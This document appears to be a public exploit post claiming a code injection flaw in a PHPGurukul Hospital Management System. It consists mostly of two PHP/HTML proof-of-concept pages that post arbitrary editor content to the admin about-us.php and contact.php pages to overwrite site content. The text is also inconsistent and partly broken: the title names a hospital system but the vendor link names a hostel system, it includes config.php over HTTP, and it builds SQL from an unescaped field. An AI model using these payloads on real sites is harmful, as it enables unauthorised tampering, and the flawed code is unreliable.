=============================================================================================================================================
| # Title     : Hospital Management System 1.0(WYSIWYG) code injection Vulnerability                                                        |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            |
| # Vendor    : https://phpgurukul.com/wp-content/uploads/2017/12/Hostel-Management-Syste-Updated-Code.zip                                  |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Part 01 : about-us.php

[+] This payload injects code of your choice into the database via NicEdit is a WYSIWYG editor V: 0.9 r25 which is called inside the file /hms/admin/about-us.php . 
   
[+] Line 2  :  Make sure to include your database connection here

[+] Line 44 :  Send the form data using fetch API (Set your target url)

[+] save payload as poc.php in your localhost path .

[+] payload : 

<?php
include('http://127.0.0.1/hospital/hms/admin/include/config.php'); // Make sure to include your database connection here

if (isset($_POST['submit'])) {
    $pagetitle = $_POST['pagetitle'];
    $pagedes = $con->real_escape_string($_POST['pagedes']);
    $query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes' WHERE PageType='aboutus'");

    if ($query) {
        echo '<script>alert("About Us has been updated.")</script>';
    } else {
        echo '<script>alert("Something Went Wrong. Please try again.")</script>';
    }
    exit;
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>indoushka | Update About Us Content</title>
    <!-- NicEdit Script -->
    <script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script>
    <script type="text/javascript">
        // Apply NicEdit to all text areas when the DOM is loaded
        bkLib.onDomLoaded(nicEditors.allTextAreas);

        // Function to handle form submission using JavaScript
        function submitForm(event) {
            event.preventDefault(); // Prevent default form submission

            const pagetitle = document.getElementById('pagetitle').value;
            const pagedes = nicEditors.findEditor('pagedes').getContent(); // Get the NicEdit content

            // Prepare the form data to be sent
            const formData = new FormData();
            formData.append('pagetitle', pagetitle);
            formData.append('pagedes', pagedes);
            formData.append('submit', true);

            // Send the form data using fetch API
            fetch('http://127.0.0.1/hospital/hms/admin/about-us.php', {
                method: 'POST',
                body: formData,
            })
            .then(response => response.text())
            .then(data => {
                alert('About Us content has been updated successfully.');
                console.log(data); // Handle the response from the server
            })
            .catch(error => {
                console.error('Error:', error);
            });
        }
    </script>
    <style>
        /* Center the form container */
        .editor-container {
            max-width: 800px;
            margin: 0 auto; /* Center horizontally */
            padding: 20px;
            text-align: center; /* Center the content inside */
        }

        /* Ensure the textarea takes the full width */
        #pagedes {
            width: 100%;
            height: 300px;
            margin: 0 auto;
        }
    </style>
</head>
<body>
    <div id="app">
        <div class="app-content">
            <div class="main-content">
                <div class="wrap-content container" id="container">
                    <!-- Page Title Section -->
                    <section id="page-title">
                        <div class="row">
                            <div class="col-sm-8">
                                <h1 class="mainTitle">Update the About Us Content</h1>
                            </div>
                          
                                </li>
                            </ol>
                        </div>
                    </section>
                    <!-- Form Section -->
                    <div class="container-fluid container-fullw bg-white">
                        <div class="row">
                            <div class="col-md-12">
                                <!-- Centering the form using a wrapper div -->
                                <div class="editor-container">
                                    <form class="forms-sample" method="post" onsubmit="submitForm(event);">
                                        <div class="form-group">
                                            <label for="pagetitle">Page Title</label>
                                            <input id="pagetitle" name="pagetitle" type="text" class="form-control" required>
                                        </div>
                                        <div class="form-group">
                                            <label for="pagedes">Page Description</label>
                                            <!-- NicEdit will enhance this textarea -->
                                            <textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea>
                                        </div>
                                        <button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button>
                                    </form>
                                </div>
                            </div>
                        </div>
                    </div>
                    <!-- End Form Section -->
                </div>
            </div>
        </div>
    </div>
    <!-- Footer -->
</body>
</html>

---------------------- [+] Part 02 : contact.php [+] --------------------

[+] Line 4  :  Make sure to include your database connection here

[+] Line 60 :  Send the form data using fetch API (Set your target url)

[+] save payload as poc.php in your localhost path .

[+] payload : 

<?php

// عنوان الخادم الخارجي
$url = 'http://127.0.0.1/hospital/hms/admin/include/config.php';

// جلب البيانات من الخادم الخارجي
$response = file_get_contents($url);

// التحقق من وجود البيانات
if ($response !== FALSE) {
    // التعامل مع البيانات
    echo $response;
} else {
    echo 'حدث خطأ أثناء جلب البيانات.';
}

if (isset($_POST['submit'])) {
    $pagetitle = $_POST['pagetitle'];
    $pagedes = $con->real_escape_string($_POST['pagedes']);
    $email = $con->real_escape_string($_POST['email']);
    $mobnum = $con->real_escape_string($_POST['mobnum']);
    
    $query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes', Email='$email', MobileNumber='$mobnum' WHERE PageType='contactus'");

    if ($query) {
        echo '<script>alert("Contact Us has been updated.")</script>';
    } else {
        echo '<script>alert("Something Went Wrong. Please try again.")</script>';
    }
    exit;
}

?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Admin | Update Contact Us Content</title>
    <!-- NicEdit Script -->
    <script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script>
    <script type="text/javascript">
        bkLib.onDomLoaded(nicEditors.allTextAreas);

        function submitForm(event) {
            event.preventDefault();

            const pagetitle = document.getElementById('pagetitle').value;
            const pagedes = nicEditors.findEditor('pagedes').getContent();
            const email = document.getElementById('email').value;
            const mobnum = document.getElementById('mobnum').value;

            const formData = new FormData();
            formData.append('pagetitle', pagetitle);
            formData.append('pagedes', pagedes);
            formData.append('email', email);
            formData.append('mobnum', mobnum);
            formData.append('submit', true);

            fetch('http://127.0.0.1/hospital/hms/admin/contact.php', {
                method: 'POST',
                body: formData,
            })
            .then(response => response.text())
            .then(data => {
                alert('Contact Us content has been updated successfully.');
                console.log(data);
            })
            .catch(error => {
                console.error('Error:', error);
            });
        }
    </script>
    <style>
        .editor-container {
            max-width: 800px;
            margin: 0 auto;
            padding: 20px;
            text-align: center;
        }

        #pagedes {
            width: 100%;
            height: 300px;
            margin: 0 auto;
        }
    </style>
</head>
<body>
    <div id="app">
        <div class="app-content">
            <div class="main-content">
                <div class="wrap-content container" id="container">
                    <section id="page-title">
                        <div class="row">
                            <div class="col-sm-8">
                                <h1 class="mainTitle">Admin | Update Contact Us Content</h1>
                            </div>
                            <ol class="breadcrumb">
                                <li class="active">
                                    <span>Update Contact Us Content</span>
                                </li>
                            </ol>
                        </div>
                    </section>
                    <div class="container-fluid container-fullw bg-white">
                        <div class="row">
                            <div class="col-md-12">
                                <div class="editor-container">
                                    <form class="forms-sample" method="post" onsubmit="submitForm(event);">
                                        <div class="form-group">
                                            <label for="pagetitle">Page Title</label>
                                            <input id="pagetitle" name="pagetitle" type="text" class="form-control" required>
                                        </div>
                                        <div class="form-group">
                                            <label for="pagedes">Page Description</label>
                                            <textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea>
                                        </div>
                                        <div class="form-group">
                                            <label for="email">Email</label>
                                            <input id="email" name="email" type="email" class="form-control" required>
                                        </div>
                                        <div class="form-group">
                                            <label for="mobnum">Mobile Number</label>
                                            <input id="mobnum" name="mobnum" type="text" class="form-control" required>
                                        </div>
                                        <button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button>
                                    </form>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</body>
</html>


Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================